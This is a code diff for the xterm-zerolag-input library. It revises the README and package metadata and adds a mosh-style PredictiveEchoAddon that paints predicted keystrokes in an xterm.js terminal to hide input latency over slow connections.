| `undoDetection()` | Undo last detection — clears flushed state, re-enables detection. For tab completion retry. |
|
||||
| `suppressBufferDetection()` | Block detection until the next `clear()`. Use for sessions that render UI framework text after the prompt. |
|
||||
| `undoDetection()` | Undo the last detection: clears flushed state and re-enables detection. For tab-completion retries. |
|
||||
|
||||
### Rendering
|
||||
|
||||
| Method | Description |
|
||||
|--------|-------------|
|
||||
| `rerender()` | Force re-render. Call after buffer reloads, screen redraws, resizes, reconnects. |
|
||||
| `refreshFont()` | Re-cache font properties from terminal. Call after font size or theme changes. |
|
||||
| `rerender()` | Force a re-render. Call after buffer reloads, screen redraws, resizes and reconnects. |
|
||||
| `refreshFont()` | Re-cache font and color properties from the terminal. Call after a font size or theme change. |
|
||||
|
||||
### Prompt Utilities
|
||||
### Prompt
|
||||
|
||||
| Method | Description |
|
||||
|--------|-------------|
|
||||
| `findPrompt()` | Find prompt position. Returns `{ row, col }` or `null`. |
|
||||
| `readPromptText()` | Read text after prompt marker. Returns string or `null`. |
|
||||
| `setPrompt(finder)` | Replace the prompt detection strategy at runtime. |
|
||||
| `findPrompt()` | Find the prompt position. Returns `{ row, col }` or `null`. |
|
||||
| `readPromptText()` | Read the text after the prompt marker. Returns a string or `null`. |
|
||||
|
||||
### State
|
||||
|
||||
| Property | Type | Description |
|
||||
|----------|------|-------------|
|
||||
| `pendingText` | `string` | Unacknowledged text (read-only) |
|
||||
| `hasPending` | `boolean` | `true` if overlay has any content |
|
||||
| `state` | `ZerolagInputState` | Full snapshot: pendingText, flushedLength, flushedText, visible, promptPosition |
|
||||
| `hasPending` | `boolean` | `true` if the overlay has any content |
|
||||
| `state` | `ZerolagInputState` | Full snapshot: `pendingText`, `flushedLength`, `flushedText`, `visible`, `promptPosition` |
|
||||
|
||||
### Options
|
||||
|
||||
@@ -228,23 +267,127 @@ Scan the terminal for text that exists after the prompt but wasn't typed through
|
||||
{
|
||||
prompt?: PromptFinder, // Default: { type: 'character', char: '>', offset: 2 }
|
||||
zIndex?: number, // Default: 7
|
||||
backgroundColor?: string, // Default: from terminal theme
|
||||
foregroundColor?: string, // Default: from computed .xterm-rows style
|
||||
backgroundColor?: string, // Default: terminal theme background ('transparent' to disable)
|
||||
foregroundColor?: string, // Default: terminal theme / computed .xterm-rows style
|
||||
showCursor?: boolean, // Default: true
|
||||
cursorColor?: string, // Default: from terminal theme
|
||||
cursorColor?: string, // Default: terminal theme cursor
|
||||
scrollDebounceMs?: number, // Default: 50
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Integration Patterns
|
||||
## `PredictiveEchoAddon` (write-through prediction)
|
||||
|
||||
### Buffered Input (hold until Enter)
|
||||
Buffering is the wrong model for TUIs that react to every keystroke: a slash
|
||||
command picker filters live, arrows edit server-side state, the composer
|
||||
rewraps as it grows. For those, `PredictiveEchoAddon` works like
|
||||
[mosh](https://mosh.org/): the keystroke goes to the PTY **immediately and
|
||||
unchanged**, and the addon simultaneously paints the predicted glyph at the
|
||||
predicted cell. When the real echo lands, the prediction is confirmed and its
|
||||
span removed: an invisible swap, identical glyph beneath. Mispredictions
|
||||
self-heal via a mismatch cascade and a TTL. It is visual-only by construction:
|
||||
nothing it does can gate, delay, reorder or rewrite what you send.
|
||||
|
||||
The quick start example above. Characters accumulate in the overlay and are sent on Enter. Best for remote shells where you want to batch input.
|
||||
```typescript
|
||||
import { Terminal } from '@xterm/xterm';
|
||||
import { PredictiveEchoAddon } from 'xterm-zerolag-input';
|
||||
|
||||
### Char-at-a-Time (send immediately)
|
||||
const terminal = new Terminal();
|
||||
const predictor = new PredictiveEchoAddon({
|
||||
// Optional: only predict when the cursor sits on a composer row
|
||||
predictWhen: (t) => {
|
||||
const buf = t.buffer.active;
|
||||
const line = buf.getLine(buf.baseY + buf.cursorY);
|
||||
return !!line && /^› /.test(line.translateToString(true));
|
||||
},
|
||||
});
|
||||
terminal.loadAddon(predictor);
|
||||
|
||||
terminal.onData((data) => {
|
||||
const cps = Array.from(data);
|
||||
if (cps.length === 1) {
|
||||
const cp = cps[0].codePointAt(0);
|
||||
if (cp === 0x7f) predictor.predictBackspace();
|
||||
else if (cp >= 0x20) predictor.predictChar(data);
|
||||
else predictor.clearPredictions(); // Enter, Ctrl+C, ...
|
||||
} else if (data.charCodeAt(0) === 0x1b) {
|
||||
predictor.clearPredictions(); // nav keys, bracketed paste
|
||||
}
|
||||
pty.write(data); // ALWAYS, unconditionally
|
||||
});
|
||||
```
|
||||
|
||||
### How reconciliation works
|
||||
|
||||
Predictions are reconciled against the **parsed terminal buffer** (cells after
|
||||
xterm's parser ran), never the raw output stream. That distinction is
|
||||
load-bearing: TUIs redraw whole lines, paint gaps with `ECH` + cursor-forward
|
||||
instead of spaces, and multiplexers like tmux rewrite everything into minimal
|
||||
deltas. Stream matching breaks on all of that; buffer cells converge to the
|
||||
same values no matter how the bytes arrived.
|
||||
|
||||
A prediction is **confirmed** only when its cell shows the predicted glyph AND
|
||||
the cursor has advanced past it (so a placeholder that happens to match, or an
|
||||
identical in-place repaint, never false-confirms). A cell showing foreign
|
||||
non-blank content on two consecutive passes drops that prediction and all
|
||||
later ones (one pass tolerates half-parsed frames). Blank cells are neutral:
|
||||
they are what "not yet echoed" looks like. Whatever remains is dropped by TTL.
|
||||
Scrolling up, resizing, or a sustained cursor move clears the run. After a
|
||||
backspace into already-echoed text, a cleared input, or a multi-char commit,
|
||||
the addon **holds** new predictions until the next parsed write: the displayed
|
||||
cursor is stale for one round trip, and anchoring on it would paint ghosts one
|
||||
cell off (worst case: exactly one unpredicted keystroke, whose own echo
|
||||
releases the hold).
|
||||
|
||||
### API
|
||||
|
||||
```typescript
|
||||
predictChar(ch: string): boolean; // false = suppressed (still SEND the key)
|
||||
predictBackspace(): boolean; // pops the newest prediction (still send \x7f)
|
||||
clearPredictions(): void;
|
||||
reconcile(): void; // manual pass (no onWriteParsed available)
|
||||
setPredictWhen(fn | null): void; // swap the gate at runtime
|
||||
refreshFont(): void; // after font/theme changes
|
||||
get hasPredictions(): boolean;
|
||||
get state(): PredictionState; // { outstanding, confirmedTotal, droppedTotal, anchor }
|
||||
```
|
||||
|
||||
### Options
|
||||
|
||||
```typescript
|
||||
{
|
||||
zIndex?: number, // Default: 7
|
||||
underlinePredictions?: boolean, // Default: false (underline unconfirmed glyphs)
|
||||
foregroundColor?: string, // Default: terminal theme / computed .xterm-rows style
|
||||
backgroundColor?: string, // Default: terminal theme background
|
||||
ttlMs?: number, // Default: 1000
|
||||
maxPending?: number, // Default: 32
|
||||
cursorGraceMs?: number, // Default: 150
|
||||
edgeMarginCells?: number, // Default: 4 (suppress near the right edge)
|
||||
predictWhen?: (t) => boolean, // Default: predict everywhere
|
||||
}
|
||||
```
|
||||
|
||||
### Which addon should I use?
|
||||
|
||||
- The remote program shows a **line prompt** and ignores partial input:
|
||||
`ZerolagInputAddon`. You also get backspace-before-send and batching.
|
||||
- The remote program **reacts per keystroke** (pickers, filters, composers
|
||||
that rewrap): `PredictiveEchoAddon`. It never withholds bytes, so the TUI
|
||||
behaves exactly as with no addon at all; you just stop waiting for the RTT.
|
||||
- Both can be loaded on one terminal and toggled per session mode; that is
|
||||
exactly what Codeman does (buffer for Claude Code, predict for Codex).
|
||||
|
||||
---
|
||||
|
||||
## Integration patterns
|
||||
|
||||
### Buffered input (hold until Enter)
|
||||
|
||||
The quick start above. Characters accumulate in the overlay and go out on Enter. Best for remote shells where you want to batch input.
|
||||
|
||||
### Char-at-a-time (send immediately)
|
||||
|
||||
```typescript
|
||||
terminal.onData((data) => {
|
||||
@@ -256,12 +399,14 @@ terminal.onData((data) => {
|
||||
ws.send(data);
|
||||
} else if (data.length === 1 && data.charCodeAt(0) >= 32) {
|
||||
zerolag.addChar(data);
|
||||
ws.send(data); // send immediately — overlay shows while echo travels back
|
||||
ws.send(data); // overlay shows the char while the echo travels back
|
||||
}
|
||||
});
|
||||
```
|
||||
|
||||
### Tab Switching (multi-session)
|
||||
This is the mode that keeps shell features intact: tab completion, `Ctrl+R` history search, and readline bindings all still work, because every byte still reaches the PTY.
|
||||
|
||||
### Tab switching (multi-session)
|
||||
|
||||
```typescript
|
||||
function switchToSession(newId: string) {
|
||||
@@ -280,19 +425,19 @@ function switchToSession(newId: string) {
|
||||
const saved = savedState.get(newId);
|
||||
if (saved) zerolag.setFlushed(saved.count, saved.text, false); // silent
|
||||
|
||||
// Render after buffer loads
|
||||
// Render after the buffer loads
|
||||
terminal.write('', () => zerolag.rerender());
|
||||
}
|
||||
```
|
||||
|
||||
### Tab Completion
|
||||
### Tab completion
|
||||
|
||||
```typescript
|
||||
const baseline = zerolag.readPromptText();
|
||||
zerolag.clear();
|
||||
sendToPty('\t');
|
||||
|
||||
// After response:
|
||||
// After the response:
|
||||
zerolag.resetBufferDetection();
|
||||
const detected = zerolag.detectBufferText();
|
||||
if (detected && detected !== baseline) {
|
||||
@@ -302,7 +447,7 @@ if (detected && detected !== baseline) {
|
||||
}
|
||||
```
|
||||
|
||||
### Resize / Font / Reconnect
|
||||
### Resize, font, reconnect
|
||||
|
||||
```typescript
|
||||
fitAddon.fit();
|
||||
@@ -311,14 +456,31 @@ zerolag.rerender();
|
||||
terminal.options.fontSize = 18;
|
||||
zerolag.refreshFont();
|
||||
|
||||
function onReconnect() { zerolag.rerender(); }
|
||||
function onReconnect() {
|
||||
zerolag.rerender();
|
||||
}
|
||||
```
|
||||
|
||||
### Wide characters (CJK, emoji)
|
||||
|
||||
Wide characters work out of the box: the overlay measures each character's cell width, renders double-width spans for wide ones, and positions later characters by visual column instead of character index. Line wrapping is computed in columns too, so a wrapped Japanese or Chinese line lands on the same cells the server will use.
|
||||
|
||||
For exact Unicode 11+ widths, load xterm's Unicode addon and the overlay will defer to it:
|
||||
|
||||
```typescript
|
||||
import { Unicode11Addon } from '@xterm/addon-unicode11';
|
||||
|
||||
terminal.loadAddon(new Unicode11Addon());
|
||||
terminal.unicode.activeVersion = '11';
|
||||
```
|
||||
|
||||
Without it, a built-in range table covers Hangul, Kana, CJK Unified (including Ext A through G), fullwidth forms and the emoji planes.
|
||||
|
||||
---
|
||||
|
||||
## How It Works
|
||||
## How it works
|
||||
|
||||
### DOM Structure
|
||||
### DOM structure
|
||||
|
||||
```
|
||||
div.xterm-screen (position: relative)
|
||||
@@ -326,53 +488,61 @@ div.xterm-screen (position: relative)
|
||||
├── div.xterm-selection (z-index: 1)
|
||||
├── div.xterm-helpers (z-index: 5)
|
||||
├── div.xterm-decoration-container (z-index: 6-7)
|
||||
└── div[zerolag overlay] (z-index: 7) ← our overlay (invisible to Ink)
|
||||
└── div[zerolag overlay] (z-index: 7) ← our overlay, invisible to Ink
|
||||
```
|
||||
|
||||
### Per-Character Grid Alignment
|
||||
### Per-character grid alignment
|
||||
|
||||
Each character is an absolutely-positioned `<span>`:
|
||||
|
||||
```
|
||||
left = charIndex * cellWidth (CSS pixels)
|
||||
top = lineIndex * cellHeight (CSS pixels)
|
||||
width = cellWidth (exact cell width)
|
||||
left = visualColumn * cellWidth (CSS pixels)
|
||||
top = lineIndex * cellHeight (CSS pixels)
|
||||
width = cellWidth * charCellWidth (1 cell, or 2 for wide characters)
|
||||
```
|
||||
|
||||
This avoids sub-pixel drift from normal DOM text flow.
|
||||
Positioning by visual column instead of letting the browser lay out text is what removes sub-pixel drift.
|
||||
|
||||
### Font Matching
|
||||
### Font matching
|
||||
|
||||
1. `fontFamily`, `fontSize`, `fontWeight` from `terminal.options`
|
||||
2. `letterSpacing` from computed style of `.xterm-rows`
|
||||
3. `-webkit-font-smoothing: antialiased` (matches canvas grayscale)
|
||||
2. `letterSpacing` from the computed style of `.xterm-rows`
|
||||
3. `-webkit-font-smoothing: antialiased` (matches canvas grayscale AA)
|
||||
4. `font-feature-settings: 'liga' 0, 'calt' 0` (no ligatures)
|
||||
5. `text-rendering: geometricPrecision`
|
||||
|
||||
### Cell Dimensions
|
||||
### Cell dimensions
|
||||
|
||||
- **xterm.js v5.x**: `terminal._core._renderService.dimensions.css.cell` (private API)
|
||||
- **xterm.js v7+**: `terminal.dimensions.css.cell` (public API, auto-detected)
|
||||
|
||||
### Prompt Column Locking
|
||||
### Prompt column locking
|
||||
|
||||
When flushed text exists, the prompt column is locked to prevent jitter from full-screen redraws. Row changes are allowed (output can scroll the prompt).
|
||||
While flushed text exists the prompt column is locked, so a full-screen redraw cannot make the overlay jitter sideways. Row changes are still allowed, because output legitimately scrolls the prompt.
|
||||
|
||||
### Scroll Awareness
|
||||
### Scroll awareness
|
||||
|
||||
Overlay hides when scrolled up (`viewportY !== baseY`). Debounced re-render when scrolling back to bottom.
|
||||
The overlay hides when the viewport is scrolled up (`viewportY !== baseY`) and re-renders, debounced, when you scroll back to the bottom.
|
||||
|
||||
---
|
||||
|
||||
## Known Limitations
|
||||
## Known limitations
|
||||
|
||||
- **Canvas/WebGL font mismatch**: Minor sub-pixel differences possible. Per-character absolute positioning minimizes this.
|
||||
- **Unicode/emoji**: Multi-byte characters occupy variable cell widths — rendered at single-cell width, causing misalignment.
|
||||
- **Password prompts**: Overlay shows characters that aren't echoed. Call `clear()` when you detect no-echo mode.
|
||||
- **Prompt in output**: If `$` appears in command output, prompt detection may find the wrong position. Use regex or custom finder.
|
||||
- **Canvas and WebGL font mismatch**: minor sub-pixel differences are still possible. Per-character absolute positioning keeps them small.
|
||||
- **Grapheme clusters**: widths are summed per code point, so ZWJ emoji sequences (for example 👨👩👧) and combining marks can be over-counted. Single-code-point emoji and CJK are correct.
|
||||
- **Password prompts**: the overlay will happily show characters the server is not echoing. Call `clear()` when you detect a no-echo prompt.
|
||||
- **Prompt characters in output**: if your prompt marker also appears in command output, detection can latch onto the wrong line. Use a regex or a custom finder.
|
||||
|
||||
---
|
||||
|
||||
## Origin
|
||||
|
||||
[Codeman](https://getcodeman.com) needed this before anyone else did. A coding agent you drive from your phone over a tunnel is unusable if every keystroke costs a round trip.
|
||||
|
||||
So the overlay was built there, ran in production for thousands of hours, and survived three deep code audits before being pulled out into this standalone library with its tests intact. Nothing was reimplemented for the extraction: the engine here is the one Codeman ships.
|
||||
|
||||
Want the whole thing? [**getcodeman.com**](https://getcodeman.com) · [github.com/Ark0N/Codeman](https://github.com/Ark0N/Codeman)
|
||||
|
||||
## License
|
||||
|
||||
MIT — [Codeman](https://github.com/Ark0N/Codeman) Contributors
|
||||
MIT, [Codeman](https://github.com/Ark0N/Codeman) Contributors
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
{
|
||||
"name": "xterm-zerolag-input",
|
||||
"version": "0.1.4",
|
||||
"description": "Instant keystroke feedback overlay for xterm.js — eliminates perceived input latency over high-RTT connections",
|
||||
"version": "0.3.0",
|
||||
"description": "Instant keystroke feedback overlay for xterm.js: Mosh-inspired local echo that removes perceived input latency over SSH, tunnels and other high-RTT connections",
|
||||
"type": "module",
|
||||
"main": "dist/index.cjs",
|
||||
"module": "dist/index.js",
|
||||
@@ -26,10 +26,20 @@
|
||||
"xterm",
|
||||
"xterm.js",
|
||||
"terminal",
|
||||
"web-terminal",
|
||||
"local-echo",
|
||||
"local echo",
|
||||
"mosh",
|
||||
"input-latency",
|
||||
"latency",
|
||||
"zero-lag",
|
||||
"keystroke",
|
||||
"ssh",
|
||||
"remote-terminal",
|
||||
"overlay",
|
||||
"addon"
|
||||
"addon",
|
||||
"predictive",
|
||||
"write-through"
|
||||
],
|
||||
"license": "MIT",
|
||||
"homepage": "https://github.com/Ark0N/Codeman/tree/master/packages/xterm-zerolag-input#readme",
|
||||
@@ -42,6 +52,7 @@
|
||||
"directory": "packages/xterm-zerolag-input"
|
||||
},
|
||||
"devDependencies": {
|
||||
"@xterm/headless": "^6.0.0",
|
||||
"jsdom": "^24.1.3",
|
||||
"tsup": "^8.5.1",
|
||||
"typescript": "^5.5.0",
|
||||
|
||||
@@ -11,37 +11,36 @@ import type { XtermTerminal, CellDimensions } from './types.js';
|
||||
* unavailable.
|
||||
*/
|
||||
export function getCellDimensions(terminal: XtermTerminal): CellDimensions | null {
|
||||
// eslint-disable-next-line @typescript-eslint/no-explicit-any
|
||||
const t = terminal as any;
|
||||
const dpr = typeof devicePixelRatio === 'number' && devicePixelRatio > 0
|
||||
? devicePixelRatio : 1;
|
||||
// eslint-disable-next-line @typescript-eslint/no-explicit-any
|
||||
const t = terminal as any;
|
||||
const dpr = typeof devicePixelRatio === 'number' && devicePixelRatio > 0 ? devicePixelRatio : 1;
|
||||
|
||||
// Try v7+ public API first
|
||||
if (t.dimensions?.css?.cell) {
|
||||
const cellH = t.dimensions.css.cell.height;
|
||||
return {
|
||||
width: t.dimensions.css.cell.width,
|
||||
height: cellH,
|
||||
charTop: (t.dimensions?.device?.char?.top ?? 0) / dpr,
|
||||
charHeight: (t.dimensions?.device?.char?.height ?? (cellH * dpr)) / dpr,
|
||||
};
|
||||
// Try v7+ public API first
|
||||
if (t.dimensions?.css?.cell) {
|
||||
const cellH = t.dimensions.css.cell.height;
|
||||
return {
|
||||
width: t.dimensions.css.cell.width,
|
||||
height: cellH,
|
||||
charTop: (t.dimensions?.device?.char?.top ?? 0) / dpr,
|
||||
charHeight: (t.dimensions?.device?.char?.height ?? cellH * dpr) / dpr,
|
||||
};
|
||||
}
|
||||
|
||||
// Fall back to v5 private API
|
||||
try {
|
||||
const dims = t._core?._renderService?.dimensions;
|
||||
if (dims?.css?.cell) {
|
||||
const cellH = dims.css.cell.height;
|
||||
return {
|
||||
width: dims.css.cell.width,
|
||||
height: cellH,
|
||||
charTop: (dims.device?.char?.top ?? 0) / dpr,
|
||||
charHeight: (dims.device?.char?.height ?? cellH * dpr) / dpr,
|
||||
};
|
||||
}
|
||||
} catch {
|
||||
// Private API may throw in some environments
|
||||
}
|
||||
|
||||
// Fall back to v5 private API
|
||||
try {
|
||||
const dims = t._core?._renderService?.dimensions;
|
||||
if (dims?.css?.cell) {
|
||||
const cellH = dims.css.cell.height;
|
||||
return {
|
||||
width: dims.css.cell.width,
|
||||
height: cellH,
|
||||
charTop: (dims.device?.char?.top ?? 0) / dpr,
|
||||
charHeight: (dims.device?.char?.height ?? (cellH * dpr)) / dpr,
|
||||
};
|
||||
}
|
||||
} catch {
|
||||
// Private API may throw in some environments
|
||||
}
|
||||
|
||||
return null;
|
||||
return null;
|
||||
}
|
||||
|
||||
@@ -1,10 +1,13 @@
|
||||
export { ZerolagInputAddon } from './zerolag-input-addon.js';
|
||||
export { PredictiveEchoAddon } from './predictive-echo-addon.js';
|
||||
export { charCellWidth, stringCellWidth } from './overlay-renderer.js';
|
||||
export type {
|
||||
XtermTerminal,
|
||||
XtermAddon,
|
||||
ZerolagInputOptions,
|
||||
ZerolagInputState,
|
||||
PromptFinder,
|
||||
PromptPosition,
|
||||
CellDimensions,
|
||||
XtermTerminal,
|
||||
XtermAddon,
|
||||
ZerolagInputOptions,
|
||||
ZerolagInputState,
|
||||
PromptFinder,
|
||||
PromptPosition,
|
||||
CellDimensions,
|
||||
} from './types.js';
|
||||
export type { PredictiveEchoOptions, PredictionState } from './predictive-echo-addon.js';
|
||||
|
||||
@@ -0,0 +1,59 @@
|
||||
/**
|
||||
* Incremental DOM renderer for PredictiveEchoAddon.
|
||||
*
|
||||
* Unlike overlay-renderer.ts (which paints whole lines with an opaque
|
||||
* background out to totalCols), prediction spans cover ONLY the predicted
|
||||
* glyph's own cells: anything wider would blank real echo arriving around
|
||||
* a prediction. Spans are keyed by prediction seq for O(1) removal.
|
||||
*/
|
||||
import type { CellDimensions, FontStyle } from './types.js';
|
||||
|
||||
export interface PredictionSpanParams {
|
||||
seq: number;
|
||||
/** Viewport-relative row (0-based). */
|
||||
row: number;
|
||||
/** Column (0-based). */
|
||||
col: number;
|
||||
char: string;
|
||||
/** Cell width of the glyph (1 or 2). */
|
||||
width: 1 | 2;
|
||||
dims: CellDimensions;
|
||||
font: FontStyle;
|
||||
underline: boolean;
|
||||
}
|
||||
|
||||
export function addPredictionSpan(
|
||||
container: HTMLElement,
|
||||
map: Map<number, HTMLSpanElement>,
|
||||
p: PredictionSpanParams
|
||||
): void {
|
||||
const span = document.createElement('span');
|
||||
// cellH+1 height: covers the sub-pixel seam between rows (same trick the
|
||||
// buffer overlay renderer ships with). Background covers only this glyph's
|
||||
// cells, never a full row.
|
||||
span.style.cssText =
|
||||
`position:absolute;left:${p.col * p.dims.width}px;top:${p.row * p.dims.height}px;` +
|
||||
`width:${p.width * p.dims.width}px;height:${p.dims.height + 1}px;line-height:${p.dims.height}px;` +
|
||||
`text-align:center;pointer-events:none;` +
|
||||
`font-family:${p.font.fontFamily};font-size:${p.font.fontSize};font-weight:${p.font.fontWeight};` +
|
||||
(p.font.letterSpacing ? `letter-spacing:${p.font.letterSpacing};` : '') +
|
||||
`color:${p.font.color};background-color:${p.font.backgroundColor};` +
|
||||
`font-feature-settings:'liga' 0,'calt' 0;` +
|
||||
(p.underline ? 'text-decoration:underline;' : '');
|
||||
span.textContent = p.char;
|
||||
map.set(p.seq, span);
|
||||
container.appendChild(span);
|
||||
}
|
||||
|
||||
export function removePredictionSpan(map: Map<number, HTMLSpanElement>, seq: number): void {
|
||||
const span = map.get(seq);
|
||||
if (span) {
|
||||
span.remove();
|
||||
map.delete(seq);
|
||||
}
|
||||
}
|
||||
|
||||
export function clearAllSpans(map: Map<number, HTMLSpanElement>): void {
|
||||
for (const span of map.values()) span.remove();
|
||||
map.clear();
|
||||
}
|
||||
@@ -0,0 +1,480 @@
|
||||
/**
|
||||
* PredictiveEchoAddon: mosh-style write-through local echo.
|
||||
*
|
||||
* The consumer sends every keystroke to the PTY unchanged (write-through);
|
||||
* this addon simultaneously paints the predicted glyph at the predicted cell.
|
||||
* When the real echo lands, the prediction is confirmed and its span removed
|
||||
* (an invisible swap: identical glyph beneath). Mispredictions self-heal via
|
||||
* a mismatch cascade and a TTL. Everything here is visual-only: no method
|
||||
* gates, delays, or rewrites what the consumer sends.
|
||||
*
|
||||
* Reconciliation reads the parsed terminal BUFFER (cells after xterm's parser
|
||||
* ran), never the raw output stream. Full-line redraws, ECH-based gap
|
||||
* painting, and tmux's in-place deltas all converge to the same cells; stream
|
||||
* matching cannot survive them (see docs/local-echo-overlay-plan.md's
|
||||
* "What NOT to Do" in the consuming repo).
|
||||
*
|
||||
* Coordinate base: xterm's `cursorY` is relative to `baseY`, so the absolute
|
||||
* buffer line for a viewport row is `baseY + row`. `viewportY` would only
|
||||
* coincide while scrolled to the bottom; this file never relies on that.
|
||||
*/
|
||||
import { getCellDimensions } from './cell-dimensions.js';
|
||||
import { charCellWidth } from './overlay-renderer.js';
|
||||
import { addPredictionSpan, clearAllSpans, removePredictionSpan } from './prediction-renderer.js';
|
||||
import type { FontStyle, XtermAddon, XtermTerminal } from './types.js';
|
||||
|
||||
export interface PredictiveEchoOptions {
|
||||
/** Z-index of the span container. @default 7 (same layer as the buffer overlay) */
|
||||
zIndex?: number;
|
||||
/** Render predicted glyphs underlined (visual hedge on unreliable links). @default false */
|
||||
underlinePredictions?: boolean;
|
||||
/** Predicted glyph color. @default theme foreground / computed .xterm-rows color */
|
||||
foregroundColor?: string;
|
||||
/** Predicted glyph background. @default theme background */
|
||||
backgroundColor?: string;
|
||||
/** Drop predictions older than this. @default 1000 */
|
||||
ttlMs?: number;
|
||||
/** Maximum outstanding predictions per run. @default 32 */
|
||||
maxPending?: number;
|
||||
/** How long the cursor may sit off the anchor row before predictions clear. @default 150 */
|
||||
cursorGraceMs?: number;
|
||||
/** Suppress predictions that would land within this many cells of the right edge. @default 4 */
|
||||
edgeMarginCells?: number;
|
||||
/** Gate: return false to suppress prediction (e.g. cursor not on a composer row). */
|
||||
predictWhen?: (terminal: XtermTerminal) => boolean;
|
||||
}
|
||||
|
||||
export interface PredictionState {
|
||||
outstanding: number;
|
||||
confirmedTotal: number;
|
||||
droppedTotal: number;
|
||||
anchor: { row: number; col: number } | null;
|
||||
}
|
||||
|
||||
interface PredictionRecord {
|
||||
seq: number;
|
||||
char: string;
|
||||
/** Cells this glyph occupies. */
|
||||
width: 1 | 2;
|
||||
/** Cumulative cell offset from the anchor column BEFORE this char. */
|
||||
offsetCells: number;
|
||||
/** Cell content at predict time, '' normalized to ' '. */
|
||||
snapshot: string;
|
||||
sentAt: number;
|
||||
/** Consecutive reconcile passes that saw foreign non-blank content. */
|
||||
mismatches: number;
|
||||
}
|
||||
|
||||
const DEFAULT_OPTIONS = {
|
||||
zIndex: 7,
|
||||
underlinePredictions: false,
|
||||
ttlMs: 1000,
|
||||
maxPending: 32,
|
||||
cursorGraceMs: 150,
|
||||
edgeMarginCells: 4,
|
||||
} as const;
|
||||
|
||||
const DEFAULT_BG = '#000000';
|
||||
const DEFAULT_FG = '#ffffff';
|
||||
|
||||
export class PredictiveEchoAddon implements XtermAddon {
|
||||
private _terminal: XtermTerminal | null = null;
|
||||
private _container: HTMLDivElement | null = null;
|
||||
private _spans = new Map<number, HTMLSpanElement>();
|
||||
private _outstanding: PredictionRecord[] = [];
|
||||
private _anchor: { row: number; col: number } | null = null;
|
||||
private _cursorOffRowSince: number | null = null;
|
||||
private _seq = 0;
|
||||
private _confirmedTotal = 0;
|
||||
private _droppedTotal = 0;
|
||||
private _ttlTimer: ReturnType<typeof setTimeout> | null = null;
|
||||
/** Anchor hold: set after an unpredicted wire edit (backspace into echoed
|
||||
* text, any cleared input, an IME text commit). While held, new
|
||||
* predictions are suppressed: the displayed cursor is stale until the
|
||||
* next parsed write, and anchoring on it paints ghosts one cell off
|
||||
* (found by review: backspace-then-retype within RTT). Cleared by the
|
||||
* onWriteParsed pass and by public reconcile(), never by the inline
|
||||
* predictChar pass (which runs before the display could catch up). */
|
||||
private _anchorHold = false;
|
||||
private _reconcileScheduled = false;
|
||||
private _disposables: Array<{ dispose(): void }> = [];
|
||||
private _predictWhen: ((terminal: XtermTerminal) => boolean) | null;
|
||||
private _options: Required<Omit<PredictiveEchoOptions, 'foregroundColor' | 'backgroundColor' | 'predictWhen'>> &
|
||||
Pick<PredictiveEchoOptions, 'foregroundColor' | 'backgroundColor'>;
|
||||
private _font: FontStyle = {
|
||||
fontFamily: 'monospace',
|
||||
fontSize: '14px',
|
||||
fontWeight: 'normal',
|
||||
color: DEFAULT_FG,
|
||||
backgroundColor: DEFAULT_BG,
|
||||
letterSpacing: '',
|
||||
};
|
||||
|
||||
constructor(options?: PredictiveEchoOptions) {
|
||||
this._options = {
|
||||
zIndex: options?.zIndex ?? DEFAULT_OPTIONS.zIndex,
|
||||
underlinePredictions: options?.underlinePredictions ?? DEFAULT_OPTIONS.underlinePredictions,
|
||||
ttlMs: options?.ttlMs ?? DEFAULT_OPTIONS.ttlMs,
|
||||
maxPending: options?.maxPending ?? DEFAULT_OPTIONS.maxPending,
|
||||
cursorGraceMs: options?.cursorGraceMs ?? DEFAULT_OPTIONS.cursorGraceMs,
|
||||
edgeMarginCells: options?.edgeMarginCells ?? DEFAULT_OPTIONS.edgeMarginCells,
|
||||
foregroundColor: options?.foregroundColor,
|
||||
backgroundColor: options?.backgroundColor,
|
||||
};
|
||||
this._predictWhen = options?.predictWhen ?? null;
|
||||
}
|
||||
|
||||
// ─── Lifecycle ────────────────────────────────────────────────────
|
||||
|
||||
/** Called by `terminal.loadAddon()`. Do not call directly. */
|
||||
activate(terminal: XtermTerminal): void {
|
||||
this._terminal = terminal;
|
||||
|
||||
this._container = document.createElement('div');
|
||||
this._container.setAttribute('data-predictive-echo', '');
|
||||
this._container.style.cssText = `position:absolute;left:0;top:0;z-index:${this._options.zIndex};pointer-events:none`;
|
||||
const screen = terminal.element?.querySelector('.xterm-screen');
|
||||
if (screen) screen.appendChild(this._container);
|
||||
|
||||
this._readFontStyle();
|
||||
|
||||
// Debounced post-parse reconcile: xterm fires onWriteParsed after the
|
||||
// parser finishes a write chunk, so buffer reads see consistent state.
|
||||
// The microtask coalesces multi-chunk bursts into one pass.
|
||||
if (typeof terminal.onWriteParsed === 'function') {
|
||||
try {
|
||||
this._disposables.push(
|
||||
terminal.onWriteParsed(() => {
|
||||
if (this._reconcileScheduled) return;
|
||||
this._reconcileScheduled = true;
|
||||
queueMicrotask(() => {
|
||||
this._reconcileScheduled = false;
|
||||
this._anchorHold = false; // a parse pass ran: the display caught up
|
||||
this._safeReconcile();
|
||||
});
|
||||
})
|
||||
);
|
||||
} catch {
|
||||
/* consumers without a working emitter fall back to manual reconcile() */
|
||||
}
|
||||
}
|
||||
if (typeof terminal.onResize === 'function') {
|
||||
try {
|
||||
this._disposables.push(terminal.onResize(() => this.clearPredictions()));
|
||||
} catch {
|
||||
/* ignore */
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
dispose(): void {
|
||||
this.clearPredictions();
|
||||
for (const d of this._disposables) {
|
||||
try {
|
||||
d.dispose();
|
||||
} catch {
|
||||
/* ignore */
|
||||
}
|
||||
}
|
||||
this._disposables = [];
|
||||
this._container?.remove();
|
||||
this._container = null;
|
||||
this._terminal = null;
|
||||
}
|
||||
|
||||
// ─── Public API ───────────────────────────────────────────────────
|
||||
|
||||
/**
|
||||
* Predict a single typed character at the current insertion point.
|
||||
* Returns false when suppressed; the consumer sends the keystroke to the
|
||||
* PTY either way (the return value is informational, never a send gate).
|
||||
*/
|
||||
predictChar(ch: string): boolean {
|
||||
try {
|
||||
this._reconcile();
|
||||
if (this._anchorHold) return false; // display has not caught up with a wire edit
|
||||
|
||||
const t = this._terminal;
|
||||
if (!t || !this._container) return false;
|
||||
const dims = getCellDimensions(t);
|
||||
if (!dims) return false;
|
||||
const buf = t.buffer.active;
|
||||
if (typeof buf.cursorX !== 'number' || typeof buf.cursorY !== 'number') return false;
|
||||
if (buf.viewportY !== buf.baseY) return false;
|
||||
